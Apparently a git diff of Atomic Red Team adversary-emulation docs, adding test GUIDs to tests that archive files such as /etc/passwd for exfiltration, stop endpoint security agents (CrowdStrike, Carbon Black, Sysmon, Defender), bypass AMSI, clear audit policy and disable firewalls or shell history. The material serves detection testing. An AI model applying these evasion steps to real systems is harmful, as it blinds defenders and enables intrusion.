## Atomic Test #1 - Compress Data for Exfiltration With Rar + +auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 + An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_path | Path that should be compressed into our output file | Path | %USERPROFILE%| | file_extension | Extension of files to compress | String | .txt| @@ -62,7 +64,7 @@ del /f /q /s #{output_file} >nul 2>&1 ##### Description: Rar tool must be installed at specified location (#{rar_exe}) ##### Check Prereq Commands: ```cmd -if not exist "#{rar_exe}" (exit /b 1) +if not exist "#{rar_exe}" (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -78,16 +80,18 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar + +auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c + Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | rar_installer | Winrar installer | Path | %TEMP%\winrar.exe| | rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe| @@ -111,7 +115,7 @@ dir ##### Description: Rar tool must be installed at specified location (#{rar_exe}) ##### Check Prereq Commands: ```cmd -if not exist "#{rar_exe}" (exit /b 1) +if not exist "#{rar_exe}" (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -127,16 +131,18 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip + +auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134 + Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%\WinZip\winzip64.exe| | winzip_url | Path to download Windows Credential Editor zip file | url | https://download.winzip.com/gl/nkln/winzip24-home.exe| @@ -162,7 +168,7 @@ dir ##### Description: Winzip must be installed ##### Check Prereq Commands: ```powershell -cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' +cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' ``` ##### Get Prereq Commands: ```powershell @@ -179,15 +185,17 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_h
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip -Note: Requires 7zip installation +auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 + +Note: Requires 7zip installation **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | 7zip_installer | 7zip installer | Path | %TEMP%\7zip.exe| | 7zip_exe | Path to installed 7zip executable | Path | %ProgramFiles%\7-zip\7z.exe| @@ -211,7 +219,7 @@ dir ##### Description: 7zip tool must be installed at specified location (#{7zip_exe}) ##### Check Prereq Commands: ```cmd -if not exist "#{7zip_exe}" (exit /b 1) +if not exist "#{7zip_exe}" (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -227,15 +235,17 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.
## Atomic Test #5 - Data Compressed - nix - zip -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. +auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0 + +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt| | output_file | Path that should be output as a zip archive | Path | $HOME/data.zip| @@ -259,7 +269,7 @@ rm -f #{output_file} ##### Description: Files to zip must exist (#{input_files}) ##### Check Prereq Commands: ```sh -if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; +if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -273,15 +283,17 @@ echo Please set input_files argument to include files that exist
## Atomic Test #6 - Data Compressed - nix - gzip Single File -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. +auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af + +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt| | input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101| @@ -307,15 +319,17 @@ rm -f #{input_file}.gz
## Atomic Test #7 - Data Compressed - nix - tar Folder or File -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. +auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a + +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME| | output_file | File that should be output | Path | $HOME/data.tar.gz| @@ -339,7 +353,7 @@ rm -f #{output_file} ##### Description: Folder to zip must exist (#{input_file_folder}) ##### Check Prereq Commands: ```sh -test -e #{input_file_folder} +test -e #{input_file_folder} ``` ##### Get Prereq Commands: ```sh @@ -353,15 +367,17 @@ echo Please set input_file_folder argument to a folder that exists
## Atomic Test #8 - Data Encrypted with zip and gpg symmetric -Encrypt data for exiltration +auto_generated_guid: 0286eb44-e7ce-41a0-b109-3da516e05a5f + +Encrypt data for exiltration **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_folder | Path used to store files. | Path | /tmp/T1560| | test_file | Temp file used to store encrypted data. | Path | T1560| @@ -390,7 +406,7 @@ rm -Rf #{test_folder} ##### Description: gpg and zip are required to run the test. ##### Check Prereq Commands: ```sh -if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; +if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md index 4265891a..8cd45ba7 100644 --- a/atomics/T1560.002/T1560.002.md +++ b/atomics/T1560.002/T1560.002.md @@ -18,15 +18,17 @@ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and
## Atomic Test #1 - Compressing data using GZip in Python (Linux) -Uses GZip from Python to compress files +auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 + +Uses GZip from Python to compress files **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd| | path_to_output_file | Path of the file that you want your .gz file to be | Path | /tmp/passwd.gz| @@ -50,7 +52,7 @@ rm #{path_to_output_file} ##### Description: Requires Python ##### Check Prereq Commands: ```bash -which_python=`which python`; $which_python -V +which_python=`which python`; $which_python -V ``` ##### Get Prereq Commands: ```bash @@ -64,15 +66,17 @@ which_python=`which python`; $which_python -V
## Atomic Test #2 - Compressing data using bz2 in Python (Linux)
-Uses bz2 from Python to compress files
+auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d
+
+Uses bz2 from Python to compress files
**Supported Platforms:** Linux
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
| path_to_output_file | Path of the file that you want your .bz2 file to be | Path | /tmp/passwd.bz2|
@@ -96,7 +100,7 @@ rm #{path_to_output_file}
##### Description: Requires Python
##### Check Prereq Commands:
```bash
-which_python=`which python`; $which_python -V
+which_python=`which python`; $which_python -V
```
##### Get Prereq Commands:
```bash
@@ -110,15 +114,17 @@ which_python=`which python`; $which_python -V
## Atomic Test #3 - Compressing data using zipfile in Python (Linux)
-Uses zipfile from Python to compress files
+auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0
+
+Uses zipfile from Python to compress files
**Supported Platforms:** Linux
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
| path_to_output_file | Path of the file that you want your .zip file to be | Path | /tmp/passwd.zip|
@@ -142,7 +148,7 @@ rm #{path_to_output_file}
##### Description: Requires Python
##### Check Prereq Commands:
```bash
-which_python=`which python`; $which_python -V
+which_python=`which python`; $which_python -V
```
##### Get Prereq Commands:
```bash
@@ -156,15 +162,17 @@ which_python=`which python`; $which_python -V
## Atomic Test #4 - Compressing data using tarfile in Python (Linux)
-Uses tarfile from Python to compress files
+auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db
+
+Uses tarfile from Python to compress files
**Supported Platforms:** Linux
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
| path_to_output_file | Path of the file that you want your .tar.gz file to be | Path | /tmp/passwd.tar.gz|
@@ -188,7 +196,7 @@ rm #{path_to_output_file}
##### Description: Requires Python
##### Check Prereq Commands:
```bash
-which_python=`which python`; $which_python -V
+which_python=`which python`; $which_python -V
```
##### Get Prereq Commands:
```bash
diff --git a/atomics/T1560/T1560.md b/atomics/T1560/T1560.md
index 4ef9d90f..7c1e6f91 100644
--- a/atomics/T1560/T1560.md
+++ b/atomics/T1560/T1560.md
@@ -12,16 +12,18 @@ Both compression and encryption are done prior to exfiltration, and can be perfo
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
+
+auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597
+
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory
-
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE|
| output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE\T1560-data-ps.zip|
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index c3e7e8bc..4681b94f 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -56,15 +56,17 @@
## Atomic Test #1 - Disable syslog
-Disables syslog collection
+auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
+
+Disables syslog collection
**Supported Platforms:** Linux
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| package_checker | Package checking command for linux. Default rpm | string | rpm -q rsyslog|
| package_installer | Package installer command for linux. Default yum | string | yum install -y rsyslog|
@@ -90,7 +92,7 @@ Disables syslog collection
##### Description: Package with rsyslog must be on system
##### Check Prereq Commands:
```sh
-if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```
##### Get Prereq Commands:
```sh
@@ -104,8 +106,10 @@ sudo #{package_installer}
## Atomic Test #2 - Disable Cb Response
-Disable the Cb Response service
+auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
+
+Disable the Cb Response service
**Supported Platforms:** Linux
@@ -135,8 +139,10 @@ fi
## Atomic Test #3 - Disable SELinux
-Disables SELinux enforcement
+auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
+
+Disables SELinux enforcement
**Supported Platforms:** Linux
@@ -163,8 +169,10 @@ setenforce 1
## Atomic Test #4 - Stop Crowdstrike Falcon on Linux
-Stop and disable Crowdstrike Falcon on Linux
+auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
+
+Stop and disable Crowdstrike Falcon on Linux
**Supported Platforms:** Linux
@@ -193,8 +201,10 @@ sudo systemctl start falcon-sensor.service
## Atomic Test #5 - Disable Carbon Black Response
-Disables Carbon Black Response
+auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
+
+Disables Carbon Black Response
**Supported Platforms:** macOS
@@ -223,8 +233,10 @@ sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.pli
## Atomic Test #6 - Disable LittleSnitch
-Disables LittleSnitch
+auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
+
+Disables LittleSnitch
**Supported Platforms:** macOS
@@ -251,8 +263,10 @@ sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
## Atomic Test #7 - Disable OpenDNS Umbrella
-Disables OpenDNS Umbrella
+auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
+
+Disables OpenDNS Umbrella
**Supported Platforms:** macOS
@@ -279,8 +293,10 @@ sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfi
## Atomic Test #8 - Disable macOS Gatekeeper
-Disables macOS Gatekeeper
+auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
+
+Disables macOS Gatekeeper
**Supported Platforms:** macOS
@@ -307,15 +323,17 @@ sudo spctl --master-enable
## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS
-Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
+auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef
+
+Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
**Supported Platforms:** macOS
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist|
| userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist|
@@ -343,16 +361,18 @@ sudo launchctl load -w #{userdaemon_plist}
## Atomic Test #10 - Unload Sysmon Filter Driver
+
+auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164
+
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
-
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
@@ -378,7 +398,7 @@ sysmon -i -accepteula -i > nul 2>&1
##### Description: Sysmon must be downloaded
##### Check Prereq Commands:
```powershell
-if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
+if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -389,7 +409,7 @@ Remove-Item $env:TEMP\Sysmon.zip -Force
##### Description: sysmon must be Installed
##### Check Prereq Commands:
```powershell
-if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
+if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -399,7 +419,7 @@ if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Window
##### Description: sysmon filter must be loaded
##### Check Prereq Commands:
```powershell
-if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
+if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -414,15 +434,17 @@ sysmon -accepteula -i
## Atomic Test #11 - Uninstall Sysmon
-Uninstall Sysinternals Sysmon for Defense Evasion
+auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
+
+Uninstall Sysinternals Sysmon for Defense Evasion
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe|
@@ -445,7 +467,7 @@ sysmon -i -accepteula >nul 2>&1
##### Description: Sysmon executable must be available
##### Check Prereq Commands:
```powershell
-if(cmd /c where sysmon) {exit 0} else {exit 1}
+if(cmd /c where sysmon) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -458,7 +480,7 @@ if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
##### Description: Sysmon must be installed
##### Check Prereq Commands:
```powershell
-if(cmd /c sc query sysmon) { exit 0} else { exit 1}
+if(cmd /c sc query sysmon) { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -472,11 +494,13 @@ cmd /c sysmon -i -accepteula
## Atomic Test #12 - AMSI Bypass - AMSI InitFailed
+
+auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd
+
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
-
**Supported Platforms:** Windows
@@ -503,10 +527,12 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key
+
+auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b
+
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
-
**Supported Platforms:** Windows
@@ -533,17 +559,19 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
## Atomic Test #14 - Disable Arbitrary Security Windows Service
+
+auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5
+
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
-
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | The name of the service to stop | String | McAfeeDLPAgentService|
@@ -570,9 +598,11 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #15 - Tamper with Windows Defender ATP PowerShell
+
+auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7
+
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings.
-
**Supported Platforms:** Windows
@@ -605,10 +635,12 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
## Atomic Test #16 - Tamper with Windows Defender Command Prompt
+
+auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2
+
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.
-
**Supported Platforms:** Windows
@@ -638,9 +670,11 @@ sc config WinDefend start=enabled >nul 2>&1
## Atomic Test #17 - Tamper with Windows Defender Registry
+
+auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
+
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info.
-
**Supported Platforms:** Windows
@@ -667,12 +701,14 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
## Atomic Test #18 - Disable Microsoft Office Security Features
+
+auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
+
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
-
**Supported Platforms:** Windows
@@ -706,12 +742,14 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
## Atomic Test #19 - Remove Windows Defender Definition Files
+
+auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
+
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
-
**Supported Platforms:** Windows
@@ -734,15 +772,17 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
## Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service
-Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
+auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143
+
+Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | The name of the service to remove | String | McAfeeDLPAgentService|
@@ -764,15 +804,17 @@ Remove-Service -Name #{service_name}
## Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows
-Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
+auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
+
+Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe|
@@ -793,17 +835,19 @@ if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet
## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder
+
+auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed
+
Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
-
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_folder | This folder will be excluded from scanning | String | C:\Temp|
@@ -830,17 +874,19 @@ Remove-MpPreference -ExclusionPath $excludedpath
## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension
+
+auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea
+
Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.
-
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_exts | A list of extension to exclude from scanning | string | .exe|
@@ -867,17 +913,19 @@ Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
## Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process
+
+auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27
+
Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."
-
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_process | A list of processes to exclude from scanning | string | outlook.exe|
diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md
index 1ca11b6f..01ba57e2 100644
--- a/atomics/T1562.002/T1562.002.md
+++ b/atomics/T1562.002/T1562.002.md
@@ -18,18 +18,20 @@ Adversaries may targeting system-wide logging or just that of a particular appli
## Atomic Test #1 - Disable Windows IIS HTTP Logging
+
+auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db
+
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
-
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
@@ -56,8 +58,10 @@ if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
## Atomic Test #2 - Kill Event Log Service Threads
-Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
+auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd
+
+Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
**Supported Platforms:** Windows
@@ -92,9 +96,11 @@ Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
## Atomic Test #3 - Impair Windows Audit Log Policy
+
+auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8
+
Disables the windows audit policy to prevent key host based telemetry being written into the event logs. [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
-
**Supported Platforms:** Windows
@@ -125,8 +131,10 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
## Atomic Test #4 - Clear Windows Audit Policy Config
-Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.
+auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6
+
+Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.
**Supported Platforms:** Windows
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md
index 5bce4173..6a66d737 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1562.003/T1562.003.md
@@ -18,15 +18,17 @@ On Windows systems, the PSReadLine module tracks commands used in a
## Atomic Test #1 - Disable history collection
-Disables history collection in shells
+auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
+
+Disables history collection in shells
**Supported Platforms:** Linux, macOS
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| evil_command | Command to run after shell history collection is disabled | String | whoami|
@@ -48,11 +50,13 @@ export HISTCONTROL=ignoreboth
## Atomic Test #2 - Mac HISTCONTROL
+
+auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
+
The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile so that it will apply to all future settings as well. https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol
-
**Supported Platforms:** macOS, Linux
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md
index 3c2b9eea..f9e8b9f6 100644
--- a/atomics/T1562.004/T1562.004.md
+++ b/atomics/T1562.004/T1562.004.md
@@ -24,15 +24,17 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
## Atomic Test #1 - Disable firewall
-Disables the firewall
+auto_generated_guid: 80f5e701-f7a4-4d06-b140-26c8efd1b6b4
+
+Disables the firewall
**Supported Platforms:** Linux
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| flavor_command | Command to disable firewall. Default firewalld. ufw (Ubuntu) command = ufw disable | String | systemctl stop firewalld ; systemctl disable firewalld|
| cleanup_command | Command to enable firewall. Default firewalld. ufw (Ubuntu) command = ufw enable | String | systemctl enable firewalld ; systemctl start firewalld|
@@ -58,9 +60,11 @@ Disables the firewall
## Atomic Test #2 - Disable Microsoft Defender Firewall
+
